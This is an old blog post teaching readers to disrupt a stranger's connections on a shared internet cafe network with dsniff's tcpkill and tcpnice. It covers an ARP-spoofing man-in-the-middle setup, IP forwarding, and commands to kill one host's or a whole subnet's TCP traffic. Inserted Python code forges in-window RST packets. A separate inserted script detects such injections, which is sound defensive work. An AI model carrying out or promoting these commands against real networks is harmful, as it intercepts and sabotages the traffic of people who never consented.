Wednesday, November 25, 2009

Tcpkill and tcpnice

Tcpkill is a program that kills live TCP connections to or from a host, network, port, or any combination of them. Tcpnice, its sibling, does not necessarily kill connections but tries to slow them down. Say you're at an internet cafe and some dude sitting next to you is hogging all the bandwidth with his multiple torrent downloads of pirated software, while you are trying to upload some important documents to your website. The frustration grows as your uploads begin to time out. What can you do about it? Well, thanks to Dug Song (author of dsniff, which ships both tools), we have two ways to irritate our neighbour.

First we need to get the neighbour's traffic flowing past our machine, since tcpkill and tcpnice can only act on connections they can see. On a switched network that means a man-in-the-middle attack (arpspoof or ettercap will do), and we must enable IP forwarding in the kernel so that the traffic we intercept still reaches its destination instead of simply disappearing:

# echo 1 > /proc/sys/net/ipv4/ip_forward

We then need to determine which local IP is hogging the bandwidth. A useful sniffer I use is tcptrack, which lists the live TCP connections it sees along with the bandwidth/speed of the data being transferred back and forth on each connection.

# tcptrack -i eth0

Once you have determined the IP of the bandwidth hog (in this example, 10.0.0.2), it's time to unleash our magic.

# tcpkill -i eth0 -9 host 10.0.0.2

The '-9' specifies the degree of brute force (1 to 9) to use in killing a connection. For every segment it sniffs, tcpkill forges that many RST segments back to the sender, each with its sequence number stepped further ahead, because a host only honours a RST whose sequence number falls inside its current receive window. On a fast connection the window has already moved on by the time the forged packet arrives, so a higher number is needed to land a RST in the moving receive window. The default is 3.
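To make the "-N" explanation concrete, here is an added example (not dsniff's code) that forges the RST segments tcpkill-style and checks which of them a victim would accept under the RFC 793 in-window rule. The offset scheme (stepping the sequence number by one advertised window per degree), the peer address 198.51.100.7 and the "100,000 bytes already received" scenario are this example's assumptions, chosen to show why -1 misses a fast connection where -3 does not.

```python
"""How tcpkill's -N "degree of brute force" works, as an added example (this is
not dsniff's code).  For every segment sniffed from A to B, tcpkill forges RST
segments from B back to A.  A RST is only honoured if its sequence number
falls inside A's current receive window, and on a busy connection that window
has moved on by the time the forged packet arrives, so several RSTs are sent
with sequence numbers stepped one window apart.  The exact offset scheme
(i * win) and the sample addresses below are this example's assumptions."""
import socket
import struct

TH_RST = 0x04


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (used for IP and TCP)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def rst_sequence_numbers(observed_ack: int, observed_win: int, severity: int) -> list:
    """Sequence numbers for `severity` forged RSTs.

    The sniffed segment's ACK is the number its sender expects next, so a RST
    with seq == ack is in-window if nothing else arrived in the meantime.  Each
    further degree adds a RST one advertised window further ahead (this
    example's stepping scheme, modelled on what tcpkill does)."""
    return [(observed_ack + i * observed_win) & 0xFFFFFFFF for i in range(severity)]


def build_rst(src_ip: str, dst_ip: str, sport: int, dport: int, seq: int) -> bytes:
    """IPv4 header + 20-byte TCP header carrying only RST, with both checksums set."""
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, TH_RST, 0, 0, 0)
    pseudo = src + dst + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", inet_checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64,
                     socket.IPPROTO_TCP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + tcp


def checksums_ok(pkt: bytes) -> bool:
    """Verify an IPv4+TCP packet: recomputing over the filled-in fields gives 0."""
    ihl = (pkt[0] & 0x0F) * 4
    ip_hdr, tcp = pkt[:ihl], pkt[ihl:]
    pseudo = ip_hdr[12:20] + struct.pack("!BBH", 0, ip_hdr[9], len(tcp))
    return inet_checksum(ip_hdr) == 0 and inet_checksum(pseudo + tcp) == 0


def forge_rsts(observed: dict, severity: int = 3) -> list:
    """Forge the RSTs tcpkill -<severity> would send for one sniffed A->B segment:
    addresses and ports are swapped so the RST appears to come from B."""
    return [build_rst(observed["dst"], observed["src"], observed["dport"], observed["sport"], seq)
            for seq in rst_sequence_numbers(observed["ack"], observed["win"], severity)]


def rst_lands(rst_seq: int, rcv_nxt: int, rcv_wnd: int) -> bool:
    """Acceptance test the victim applies (RFC 793): RCV.NXT <= SEG.SEQ < RCV.NXT+RCV.WND,
    computed modulo 2**32."""
    return ((rst_seq - rcv_nxt) & 0xFFFFFFFF) < rcv_wnd


if __name__ == "__main__":
    # Constructed sample: 10.0.0.2 (the bandwidth hog) talking to a remote peer.
    observed = {"src": "10.0.0.2", "sport": 4455, "dst": "198.51.100.7", "dport": 80,
                "ack": 1000, "win": 65535}
    # By the time the forged RST arrives the hog has already received 100,000 more
    # bytes, so its RCV.NXT is 101000.  -1 misses; -3 has a RST that lands.
    rcv_nxt = 101000
    for severity in (1, 3, 9):
        seqs = rst_sequence_numbers(observed["ack"], observed["win"], severity)
        hit = any(rst_lands(s, rcv_nxt, observed["win"]) for s in seqs)
        pkts = forge_rsts(observed, severity)
        print("-%d: seqs=%s lands=%s valid=%s" % (severity, seqs, hit, all(map(checksums_ok, pkts))))
```

Run it as root-free code: it only builds bytes and never puts them on the wire. The interesting line is the one for -1, whose single RST at seq 1000 is rejected once the hog's window has advanced past it, while the third RST of -3 (seq 132070) lands inside [101000, 166535).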

This kills every TCP connection to or from 10.0.0.2 that tcpkill can see (it is TCP only; UDP traffic is untouched). If you want to be more specific and only kill the connection that is using the most bandwidth, match the port as well:

# tcpkill -i eth0 -9 host 10.0.0.2 and port 4455

Or, if you're really mad at the world, you can take down every TCP connection on the whole subnet. The expression is libpcap/BPF filter syntax, so "net 192.168.1" means 192.168.1.0/24:

# tcpkill -9 net 192.168.1

Similarly, tcpnice can be used to slow connections down, rather than to simply kill them.

# tcpnice -i eth0 -A host 10.0.0.2

[Options]
-A Inject TCP tiny window advertisements (the sender must shrink its sends to the tiny window).
-I Inject ICMP source quench replies (asks the sender to slow down).
-M Inject ICMP fragmentation-needed replies with tiny next-hop MTUs (forces tiny segments).
-i interface to listen on
If none of -A, -I, -M is given, all three are used.
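The flip side of these two tools, as an added example that is not dsniff's code: a small classifier that flags, in raw IPv4 packets, the four injections described on this page (tcpkill's RSTs, and tcpnice's tiny window advertisements, ICMP source quench and fragmentation-needed with a tiny next-hop MTU). The thresholds (window under 512, MTU under 576), the peer address 198.51.100.7 and the sample packets are constructed for the example; the classifier does not verify checksums.

```python
"""Defender's side of this post, as an added example (not dsniff code): classify
raw IPv4 packets for the four injections tcpkill and tcpnice perform.  The
thresholds are this example's assumptions, and the sample packets are
constructed inline (checksums left at zero; the classifier does not verify them)."""
import struct
from collections import Counter

TINY_WINDOW = 512   # assumption: below this a pure ACK's window looks like tcpnice -A
TINY_MTU = 576      # assumption: IPv4 minimum reassembly size; tcpnice -M advertises less
IPPROTO_ICMP, IPPROTO_TCP = 1, 6
ICMP_DEST_UNREACH, ICMP_SOURCE_QUENCH, ICMP_FRAG_NEEDED = 3, 4, 4
TH_RST, TH_ACK = 0x04, 0x10


def classify(pkt: bytes):
    """Label a suspicious IPv4 packet, or return None for anything that looks benign."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    proto, body = pkt[9], pkt[ihl:]
    if proto == IPPROTO_TCP and len(body) >= 20:
        flags = body[13]
        (win,) = struct.unpack("!H", body[14:16])
        if flags & TH_RST:
            return "tcp-rst"            # tcpkill
        if flags & TH_ACK and win < TINY_WINDOW:
            return "tiny-window"        # tcpnice -A
    elif proto == IPPROTO_ICMP and len(body) >= 8:
        icmp_type, code = body[0], body[1]
        if icmp_type == ICMP_SOURCE_QUENCH:
            return "source-quench"      # tcpnice -I (RFC 6633 deprecated source quench)
        if icmp_type == ICMP_DEST_UNREACH and code == ICMP_FRAG_NEEDED:
            (mtu,) = struct.unpack("!H", body[6:8])   # RFC 1191 next-hop MTU field
            if mtu < TINY_MTU:
                return "tiny-mtu"       # tcpnice -M
    return None


def scan(pkts) -> Counter:
    """Count suspicious packets per (source IP, label).  Injected packets carry the
    remote peer's address, so the source tells you which connections are being
    hit, not who injects; a sudden burst per peer is the signal, since single
    zero-window ACKs and occasional frag-needed messages are legitimate."""
    counts = Counter()
    for pkt in pkts:
        label = classify(pkt)
        if label:
            counts[(".".join(str(b) for b in pkt[12:16]), label)] += 1
    return counts


# --- constructed samples (not captured traffic) -------------------------------
def _addr(s: str) -> bytes:
    return bytes(int(x) for x in s.split("."))


def _ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      _addr(src), _addr(dst))
    return hdr + payload


def _tcp(sport: int, dport: int, flags: int, win: int) -> bytes:
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, win, 0, 0)


def _icmp(icmp_type: int, code: int, rest: bytes) -> bytes:
    return struct.pack("!BBH", icmp_type, code, 0) + rest


HOG, PEER = "10.0.0.2", "198.51.100.7"
SAMPLES = {
    "normal-ack":  _ipv4(HOG, PEER, IPPROTO_TCP, _tcp(4455, 80, TH_ACK, 65535)),
    "rst":         _ipv4(PEER, HOG, IPPROTO_TCP, _tcp(80, 4455, TH_RST, 0)),
    "tiny-win":    _ipv4(PEER, HOG, IPPROTO_TCP, _tcp(80, 4455, TH_ACK, 1)),
    "quench":      _ipv4(PEER, HOG, IPPROTO_ICMP, _icmp(ICMP_SOURCE_QUENCH, 0, b"\x00" * 4)),
    "frag-needed": _ipv4(PEER, HOG, IPPROTO_ICMP,
                         _icmp(ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED, struct.pack("!HH", 0, 68))),
    "pmtu-1400":   _ipv4(PEER, HOG, IPPROTO_ICMP,
                         _icmp(ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED, struct.pack("!HH", 0, 1400))),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print("%-12s -> %s" % (name, classify(pkt)))
    print(scan(SAMPLES.values()))
```

The "pmtu-1400" sample is the ordinary path-MTU-discovery message a router sends and is left alone; only an implausibly small next-hop MTU is flagged. Because the forged packets are spoofed from the remote peer, catching the injector itself needs link-layer evidence (the MAC or TTL the packet actually arrived with), which is outside what this IP-level classifier sees.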

References/Good reading:
http://www.preterhuman.net/texts/underground/hacking/dsniff.txt
http://www.enterprisenetworkingplanet.com/netos/article.php/3564471

